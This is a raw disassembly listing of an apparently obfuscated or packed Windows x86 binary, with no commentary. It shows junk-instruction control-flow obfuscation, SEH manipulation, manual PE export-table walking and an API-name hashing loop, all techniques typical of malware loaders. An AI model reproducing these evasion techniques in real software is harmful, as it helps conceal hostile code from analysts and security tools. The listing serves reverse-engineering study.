jmp loc_42CEC1
sub_42380D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_423823: ; CODE XREF: sub_42B15E-6508�j
rol ecx, 0Eh
xchg edi, [esp+0]
mov eax, edi
pop edi
pop ecx
jmp loc_428FBC
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
loc_423832: ; CODE XREF: _0182ofla:0042997E�j
jl loc_427C87
mov ebx, edx
pop edx
jmp loc_427049
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_225. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_423841: ; CODE XREF: _0182ofla:0042DB15�j
jmp loc_426E52
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E4D
loc_423846: ; CODE XREF: sub_425E4D+5206�j
jmp nullsub_78
; END OF FUNCTION CHUNK FOR sub_425E4D
; ---------------------------------------------------------------------------
loc_42384B: ; CODE XREF: _0182ofla:0042347F�j
jmp loc_42743A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_423850: ; CODE XREF: sub_423FCD:loc_423FD8�j
and ecx, 82077820h
jp loc_42DA12
jmp loc_4289EB
; END OF FUNCTION CHUNK FOR sub_423FCD
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423861 proc near ; DATA XREF: sub_428EAF�o
var_5 = byte ptr -5
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424471 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00424666 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426BA9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042734E SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00428F7C SIZE 0000002B BYTES
; FUNCTION CHUNK AT 00429164 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004291B0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429870 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042A06F SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042A2ED SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042B1DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D816 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042E04A SIZE 0000000E BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp+var_4], eax
loc_42386A: ; CODE XREF: sub_423861+9FB8�j
jno loc_429164
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
jmp loc_424471
sub_423861 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C677
loc_42387B: ; CODE XREF: sub_42C677:loc_42C68F�j
mov ecx, esp
add ecx, 10h
mov ecx, [ecx]
mov dword ptr [ecx], 10013h
add ecx, 18h
jmp loc_42C224
; END OF FUNCTION CHUNK FOR sub_42C677
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428A39
loc_423896: ; CODE XREF: sub_428A39+4370�j
call sub_4281B9
loc_42389B: ; CODE XREF: _0182ofla:0042348B�j
jno loc_42C2A4
or eax, esi
; END OF FUNCTION CHUNK FOR sub_428A39
; =============== S U B R O U T I N E =======================================
sub_4238A3 proc near ; CODE XREF: _0182ofla:0042582B�p
xchg eax, [esp+0]
pop eax
call sub_42D71D
push offset sub_429EF7
jmp loc_428510
sub_4238A3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4267F8
loc_4238B6: ; CODE XREF: sub_4267F8-19FD�j
mov dl, [ebp-9]
shr edx, cl
or eax, edx
mov edx, [ebp-8]
mov [edx], al
jmp loc_42EA0A
; END OF FUNCTION CHUNK FOR sub_4267F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9A4
loc_4238C7: ; CODE XREF: sub_42D9A4-676�j
test ebx, 0F6A0F502h
jmp loc_42C668
; END OF FUNCTION CHUNK FOR sub_42D9A4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB3E
loc_4238D2: ; CODE XREF: _0182ofla:00424396�j
; sub_42AB3E+6�j
pushf
push 8114EB46h
pop edi
and edi, 0B6287B64h
jnz loc_426504
loc_4238E5: ; CODE XREF: sub_42A00A+F�j
jmp loc_429438
; END OF FUNCTION CHUNK FOR sub_42AB3E
; ---------------------------------------------------------------------------
mov ebx, [eax]
xor ebx, ecx
jmp loc_4249CE
; ---------------------------------------------------------------------------
loc_4238F3: ; CODE XREF: _0182ofla:0042686D�j
js loc_42DDE9
; =============== S U B R O U T I N E =======================================
sub_4238F9 proc near ; CODE XREF: sub_42768C+7�p
; FUNCTION CHUNK AT 00425836 SIZE 00000005 BYTES
mov [esp+0], eax
pop eax
mov eax, [eax+20h]
add eax, [ebp-4]
push offset loc_427392
jmp loc_425836
sub_4238F9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E6E
loc_42390D: ; CODE XREF: sub_424E6E:loc_428F3C�j
adc ebx, 0B7855AB1h
adc ecx, 8B5DB4D5h
shl esi, 4
jmp loc_427F98
; END OF FUNCTION CHUNK FOR sub_424E6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428A39
loc_423921: ; CODE XREF: sub_428A39:loc_426D88�j
jnz loc_423D59
mov eax, [ebp-14h]
mov eax, [eax+24h]
add eax, [ebp-4]
xor edx, edx
jmp loc_42950D
; END OF FUNCTION CHUNK FOR sub_428A39
; ---------------------------------------------------------------------------
loc_423937: ; CODE XREF: _0182ofla:00428E69�j
jb loc_4244FE
; =============== S U B R O U T I N E =======================================
sub_42393D proc near ; CODE XREF: sub_4276BF-9AC�p
mov [esp+0], ecx
pop ecx
push 0C781E25Eh
mov eax, offset sub_4276BF
xchg eax, [esp+0]
retn
sub_42393D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425DDF
loc_42394F: ; CODE XREF: sub_425DDF+9�j
add eax, [ebp-4]
add eax, 18h
; END OF FUNCTION CHUNK FOR sub_425DDF
; START OF FUNCTION CHUNK FOR sub_424289
loc_423955: ; CODE XREF: sub_424289+649B�j
push offset sub_425EEB
jmp nullsub_65
; END OF FUNCTION CHUNK FOR sub_424289
; =============== S U B R O U T I N E =======================================
sub_42395F proc near ; DATA XREF: sub_4231F3:loc_42E46E�o
arg_0 = dword ptr 4
xchg ebx, [esp+0]
mov edi, ebx
pop ebx
xor edi, 0C5EFB82Eh
add edi, 59ADA411h
xchg edi, [esp-4+arg_0]
jmp sub_428D17
sub_42395F endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_145. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425DA5
loc_42397A: ; CODE XREF: sub_425DA5:loc_425DBB�j
jz loc_428285
push ebx
push 58C9255Ah
pop ebx
jmp loc_429356
; END OF FUNCTION CHUNK FOR sub_425DA5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A915
loc_42398C: ; CODE XREF: sub_42A915:loc_42CC24�j
push edi
push offset loc_42C61C
jmp loc_423FDD
; END OF FUNCTION CHUNK FOR sub_42A915
; ---------------------------------------------------------------------------
loc_423997: ; CODE XREF: _0182ofla:loc_427504�j
jmp loc_426216
; ---------------------------------------------------------------------------
jmp loc_42A54D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42380D
loc_4239A1: ; CODE XREF: sub_42380D:loc_428CAC�j
push edx
push 0FA9A0718h
pop edx
push offset sub_423461
jmp loc_426450
; END OF FUNCTION CHUNK FOR sub_42380D
; ---------------------------------------------------------------------------
jz loc_428CDB
jmp sub_429AE0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426571
loc_4239BD: ; CODE XREF: sub_426571:loc_42460D�j
push 207FB102h
pop edx
xor edx, 0E80ACEF7h
and edx, 93D700F6h
add edx, 7FED30C0h
mov [edx], eax
jmp loc_427164
; END OF FUNCTION CHUNK FOR sub_426571
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_160. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1B2
loc_4239DD: ; CODE XREF: sub_42C1B2+10D2�j
jmp nullsub_137
; END OF FUNCTION CHUNK FOR sub_42C1B2
; ---------------------------------------------------------------------------
loc_4239E2: ; CODE XREF: _0182ofla:0042831A�j
jmp loc_42D99B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42660C
loc_4239E7: ; CODE XREF: sub_42660C-396�j
and eax, 0E7743996h
sbb esi, eax
loc_4239EF: ; DATA XREF: sub_426649+39A6�o
pop dword ptr fs:0
xchg eax, [esp+14h+var_14]
pop eax
jmp loc_4231BD
; END OF FUNCTION CHUNK FOR sub_42660C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425DA5
loc_4239FE: ; CODE XREF: sub_425DA5+57D6�j
test ebx, 133B4013h
jmp loc_423A59
; END OF FUNCTION CHUNK FOR sub_425DA5
; ---------------------------------------------------------------------------
loc_423A09: ; DATA XREF: sub_428E4B+C�o
mov byte ptr [eax], 0C3h
push ecx
push 21C5266Ch
pop ecx
push offset loc_425429
jmp locret_42B721
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424707
loc_423A1D: ; CODE XREF: sub_424707+2DD1�j
mov ebx, ecx
pop ecx
pop eax
mov edx, offset sub_423A2A
xchg edx, [esp-8+arg_4]
retn
; END OF FUNCTION CHUNK FOR sub_424707
; =============== S U B R O U T I N E =======================================
sub_423A2A proc near ; DATA XREF: sub_424707-CE6�o
; FUNCTION CHUNK AT 00423045 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042323F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423423 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00423515 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004235A6 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00423E3C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042427E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004243E6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004246C3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004247C6 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00424B04 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00424C84 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00424C90 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00424FA8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042574D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425926 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00425A13 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426037 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042670D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426758 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004269B2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426F8C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00427128 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00427B1E SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042800B SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042806F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004283D7 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00428403 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00428501 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00428975 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00428E7C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042965F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A39C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A563 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042AC39 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B418 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042B429 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042B495 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B67E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B7BB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C1BE SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042CB26 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042CCBD SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042DB84 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042E07F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E2E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E48E SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042E557 SIZE 0000000B BYTES
pop ebp
jmp loc_4283D7
sub_423A2A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4240FC
loc_423A30: ; CODE XREF: sub_4240FC:loc_42ECA8�j
add esp, 8
mov eax, [eax]
add eax, [ebp-4]
call sub_4289E4
jmp loc_42D1F8
; END OF FUNCTION CHUNK FOR sub_4240FC
; =============== S U B R O U T I N E =======================================
sub_423A42 proc near ; CODE XREF: sub_42B097+1A22�j
; FUNCTION CHUNK AT 004251E5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042C123 SIZE 00000005 BYTES
add esp, 0FFFFFFE4h
mov [ebp-8], edx
mov [ebp-4], eax
xor eax, eax
jmp loc_4251E5
sub_423A42 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_423A52: ; CODE XREF: sub_42D056:loc_4236BB�j
cdq
push edi
jmp loc_42A7AE
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425DA5
loc_423A59: ; CODE XREF: sub_425DA5-23A1�j
js locret_425F80
mov [edi], esi
; END OF FUNCTION CHUNK FOR sub_425DA5
; =============== S U B R O U T I N E =======================================
sub_423A61 proc near ; CODE XREF: _0182ofla:0042B525�p
xchg eax, [esp+0]
pop eax
push eax
jmp loc_4253D6
sub_423A61 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A760
loc_423A6B: ; CODE XREF: sub_42A760:loc_429792�j
adc esi, 0CEA72A9h
xor ecx, 746CFF6Dh
adc ecx, eax
jmp loc_42A8BD
; END OF FUNCTION CHUNK FOR sub_42A760
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4289E4
loc_423A7E: ; CODE XREF: sub_4289E4:loc_429FB9�j
pop eax
xor eax, 0A8B326CBh
add eax, 0BF438E4Bh
add eax, ebp
add eax, 9F6B0EAEh
mov eax, [eax]
jmp loc_42D2A4
; END OF FUNCTION CHUNK FOR sub_4289E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42349B
loc_423A9A: ; CODE XREF: sub_42349B:loc_426EC2�j
xchg eax, [esp-4+arg_0]
push 10h
call sub_42DB2E
loc_423AA4: ; CODE XREF: sub_428D63+3F23�j
jmp loc_424D52
; END OF FUNCTION CHUNK FOR sub_42349B
; ---------------------------------------------------------------------------
rol edx, 8
jmp sub_42A915
; =============== S U B R O U T I N E =======================================
sub_423AB1 proc near ; CODE XREF: _0182ofla:00425F97�j
; sub_4231F3+339D�p
; FUNCTION CHUNK AT 00428E98 SIZE 00000007 BYTES
xchg esi, [esp+0]
pop esi
call sub_424065
jnz loc_428E98
jmp loc_42B6DB
sub_423AB1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231F3
loc_423AC5: ; CODE XREF: sub_4231F3:loc_42D510�j
mov ecx, [ebx+3Ch]
mov ecx, [ebx+ecx+78h]
or ecx, ecx
jz loc_428E98
jmp loc_42692A
; END OF FUNCTION CHUNK FOR sub_4231F3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_23. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B669
loc_423ADA: ; CODE XREF: sub_42B669+10�j
jmp loc_42E0E1
; END OF FUNCTION CHUNK FOR sub_42B669
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F0F
loc_423ADF: ; CODE XREF: sub_428F0F+1DBB�j
jmp loc_424E57
; END OF FUNCTION CHUNK FOR sub_428F0F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_423AE4: ; CODE XREF: sub_428F20-3094�j
sbb edi, ebp
pop edi
cmp ecx, 3796DE76h
jmp loc_425A76
; END OF FUNCTION CHUNK FOR sub_428F20
; =============== S U B R O U T I N E =======================================
sub_423AF2 proc near ; CODE XREF: _0182ofla:0042A951�j
; sub_42E178+1�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004265F8 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004281A8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00428456 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00429831 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AE9D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042B791 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042DF25 SIZE 00000017 BYTES
mov [esp+0], ecx
pop ecx
mov [esp-4+arg_0], eax
pushf
mov [esp+0], ebx
push 7E7D400Fh
pop ebx
jmp loc_4281A8
sub_423AF2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_423B08 proc near ; CODE XREF: sub_42D71D:loc_4285F4�j
add esp, 0FFFFFED8h
mov [ebp-8], edx
mov [ebp-4], eax
call sub_4256AD
sub_423B08 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4254D3
loc_423B19: ; CODE XREF: sub_4254D3+503E�j
jmp loc_425DD5
; END OF FUNCTION CHUNK FOR sub_4254D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_423B1E: ; CODE XREF: sub_428D63:loc_42525F�j
mov esi, ebp
push 0D040266Ch
rol ecx, 0Ch
ja loc_425D30
jmp loc_42620C
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_423B33: ; CODE XREF: sub_428F20:loc_42A4B0�j
jz loc_428C28
jmp loc_424599
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
loc_423B3E: ; CODE XREF: _0182ofla:0042B691�j
push 0E346ECBDh
; =============== S U B R O U T I N E =======================================
sub_423B43 proc near ; CODE XREF: _0182ofla:0042DFB1�p
; FUNCTION CHUNK AT 00425BB2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429DC4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B228 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CFF1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D2FE SIZE 0000000B BYTES
mov [esp+0], edi
pop edi
cmp dword ptr [ebp-4], 100h
jmp loc_42D2FE
sub_423B43 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_423B53 proc near ; CODE XREF: sub_429BB9�p
; _0182ofla:0042D6B6�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00427687 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A781 SIZE 0000001A BYTES
mov [esp+0], edx
pop edx
jz sub_425B6E
pushf
mov [esp+0], ebp
jmp loc_427687
sub_423B53 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E35C
loc_423B66: ; CODE XREF: sub_42E35C:loc_42DF97�j
xchg esi, [esp+4+var_4]
jmp sub_42CA29
; END OF FUNCTION CHUNK FOR sub_42E35C
; ---------------------------------------------------------------------------
test eax, eax
jz loc_42CC44
jmp loc_42E568
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427DA9
loc_423B7B: ; CODE XREF: sub_427DA9:loc_4298B7�j
; _0182ofla:loc_42B1F3�j
jnz loc_42A32E
jmp loc_42B5BA
; END OF FUNCTION CHUNK FOR sub_427DA9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_423B86: ; CODE XREF: sub_428F20:loc_424599�j
mov [edx], ebx
jmp loc_428C1C
; END OF FUNCTION CHUNK FOR sub_428F20
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_135. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429B69
loc_423B8E: ; CODE XREF: sub_429B69:loc_42D3C4�j
jz sub_4272F4
jmp sub_42493A
; END OF FUNCTION CHUNK FOR sub_429B69
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429E52
loc_423B99: ; CODE XREF: sub_429E52+10�j
jnz loc_425520
jmp loc_424169
; END OF FUNCTION CHUNK FOR sub_429E52
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427DFA
loc_423BA4: ; CODE XREF: sub_427DFA+F�j
add edx, ebp
add edx, 229CA9EEh
mov edx, [edx]
mov byte ptr [eax+edx], 0
inc dword ptr [ebp-4]
loc_423BB5: ; CODE XREF: _0182ofla:loc_4292B8�j
cmp dword ptr [ebp-4], 100h
jmp loc_426621
; END OF FUNCTION CHUNK FOR sub_427DFA
; ---------------------------------------------------------------------------
jl loc_425E39
jmp loc_425DDD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253DC
loc_423BCC: ; CODE XREF: sub_4253DC+48BD�j
and esi, edi
xchg ebp, [edx]
jmp loc_429480
; END OF FUNCTION CHUNK FOR sub_4253DC
; =============== S U B R O U T I N E =======================================
sub_423BD5 proc near ; DATA XREF: sub_4292E1-4802�o
push 95867047h
pop eax
rol eax, 1
call sub_42839E
jmp loc_425E97
sub_423BD5 endp
; =============== S U B R O U T I N E =======================================
sub_423BE7 proc near ; CODE XREF: _0182ofla:00426CE5�j
; sub_429FC8:loc_4284BC�p
arg_0 = dword ptr 4
mov [esp+0], ecx
pop ecx
add edx, 84D52FFCh
xchg edx, [esp-4+arg_0]
jmp sub_424CD8
sub_423BE7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EAB7
loc_423BF9: ; CODE XREF: sub_42EAB7:loc_42C759�j
add ebx, esi
xchg ebx, ecx
and ecx, ebx
jmp loc_428C9D
; END OF FUNCTION CHUNK FOR sub_42EAB7
; ---------------------------------------------------------------------------
loc_423C04: ; DATA XREF: sub_426240+7983�o
jz loc_4262D2
; START OF FUNCTION CHUNK FOR sub_426571
loc_423C0A: ; CODE XREF: sub_426571+13B8�j
; sub_426571+21FB�j
jz loc_427098
mov eax, [ebp-4]
call sub_426E44
mov [ebp-8], eax
jmp loc_4287D2
; END OF FUNCTION CHUNK FOR sub_426571
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427E42
loc_423C20: ; CODE XREF: sub_427E42+18D5�j
rol edi, 2
loc_423C23: ; CODE XREF: sub_427E42:loc_42970E�j
and eax, 86BC8C2Ah
loc_423C29: ; CODE XREF: _0182ofla:loc_4268C5�j
add eax, 0BFBC390h
loc_423C2F: ; CODE XREF: _0182ofla:loc_427054�j
add eax, ebp
jmp loc_425A32
; END OF FUNCTION CHUNK FOR sub_427E42
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C89
loc_423C36: ; CODE XREF: sub_425C89+29FE�j
jge loc_42E414
or ebx, ecx
adc edx, edi
loc_423C40: ; CODE XREF: sub_425C89:loc_42A1CE�j
call sub_428D17
jmp loc_42850B
; END OF FUNCTION CHUNK FOR sub_425C89
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42433C
loc_423C4A: ; CODE XREF: sub_42433C+D�j
rol edx, 5
xor edx, ecx
rol edx, 5
add edx, eax
rol edx, 5
xor edx, esi
rol edx, 5
jmp loc_42CDDD
; END OF FUNCTION CHUNK FOR sub_42433C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_423C61: ; CODE XREF: sub_42798F+1D�j
and esi, ebp
pushf
push edi
loc_423C65: ; DATA XREF: sub_42798F+60C7�o
pop dword ptr fs:0
jmp loc_424E46
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_423C70: ; DATA XREF: sub_423395+7D76�o
add eax, 1790C39Bh
mov dword ptr [eax], 646E6957h
lea eax, [ebp-18h]
mov dword ptr [eax], 6C43776Fh
lea eax, [ebp-14h]
mov dword ptr [eax], 737361h
push 0
lea eax, [ebp-20h]
jmp loc_427D82
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_193. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D03E
loc_423C99: ; CODE XREF: sub_42D03E+3�j
jmp loc_428BED
; END OF FUNCTION CHUNK FOR sub_42D03E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253DC
loc_423C9E: ; CODE XREF: sub_4253DC:loc_42E9D1�j
pop ebp
mov eax, ds:dword_425794
or eax, eax
jnz loc_42D2DA
jmp loc_42A03C
; END OF FUNCTION CHUNK FOR sub_4253DC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_238. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427906
loc_423CB3: ; CODE XREF: sub_427906+69D7�j
jmp loc_42DD1A
; END OF FUNCTION CHUNK FOR sub_427906
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428041
loc_423CB8: ; CODE XREF: sub_428041-336E�j
jmp loc_425953
; END OF FUNCTION CHUNK FOR sub_428041
; ---------------------------------------------------------------------------
xchg ebx, ebp
jmp sub_4276E3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428A39
loc_423CC4: ; CODE XREF: sub_428A39:loc_428A44�j
add [esi], ecx
xor [esi], edx
push 6ECDBDF0h
pop eax
xor eax, ds:4000F5h
cmp eax, 56D231A0h
jmp loc_425269
; END OF FUNCTION CHUNK FOR sub_428A39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C55
loc_423CDF: ; CODE XREF: sub_425C55+14�j
jz loc_42857E
jmp loc_423604
; END OF FUNCTION CHUNK FOR sub_425C55
; =============== S U B R O U T I N E =======================================
sub_423CEA proc near ; DATA XREF: sub_4232CD+7�o
mov [ebp-8], eax
loc_423CED: ; CODE XREF: sub_428EF6+8�j
; sub_42A1D9+4�j ...
call sub_429408
mov [ebp-0Ah], al
sub_423CEA endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4267F8
loc_423CF5: ; CODE XREF: sub_4267F8:loc_42D114�j
jb loc_42E084
mov eax, [ebp-4]
cmp byte ptr [eax], 0
jmp loc_426F58
; END OF FUNCTION CHUNK FOR sub_4267F8
; ---------------------------------------------------------------------------
push 6E2E2202h
jmp loc_42E6B9
; ---------------------------------------------------------------------------
test al, al
jz nullsub_89
jmp loc_42AD9D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_182. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E18E
loc_423D1E: ; CODE XREF: sub_42E18E+18�j
jmp loc_426B49
; END OF FUNCTION CHUNK FOR sub_42E18E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C415
loc_423D23: ; CODE XREF: sub_42C415+13�j
jmp loc_425116
; END OF FUNCTION CHUNK FOR sub_42C415
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F46
loc_423D28: ; CODE XREF: sub_428F46-3E4D�j
jmp loc_42A219
; END OF FUNCTION CHUNK FOR sub_428F46
; =============== S U B R O U T I N E =======================================
sub_423D2D proc near ; CODE XREF: sub_42CD44-7BF6�p
; _0182ofla:004294F9�j
; FUNCTION CHUNK AT 004261F2 SIZE 0000001A BYTES
xchg ecx, [esp+0]
pop ecx
xor edi, 0CD3B3BD0h
cmp eax, edi
jmp loc_4261F2
sub_423D2D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423114
loc_423D3E: ; CODE XREF: sub_423114+D�j
jnz loc_42DDB2
jmp loc_4265E0
; END OF FUNCTION CHUNK FOR sub_423114
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F50
loc_423D49: ; CODE XREF: sub_423F50:loc_425921�j
inc dword ptr [ebp-1Ch]
jmp loc_42D581
; END OF FUNCTION CHUNK FOR sub_423F50
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425AB1
loc_423D51: ; CODE XREF: sub_425AB1�j
inc dword ptr [ebp-1Ch]
jmp loc_42AF5C
; END OF FUNCTION CHUNK FOR sub_425AB1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428A39
loc_423D59: ; CODE XREF: sub_428A39:loc_423921�j
; _0182ofla:loc_42D25E�j
inc dword ptr [ebp-18h]
dec dword ptr [ebp-24h]
jnz loc_427D55
jmp loc_425EE4
; END OF FUNCTION CHUNK FOR sub_428A39
; ---------------------------------------------------------------------------
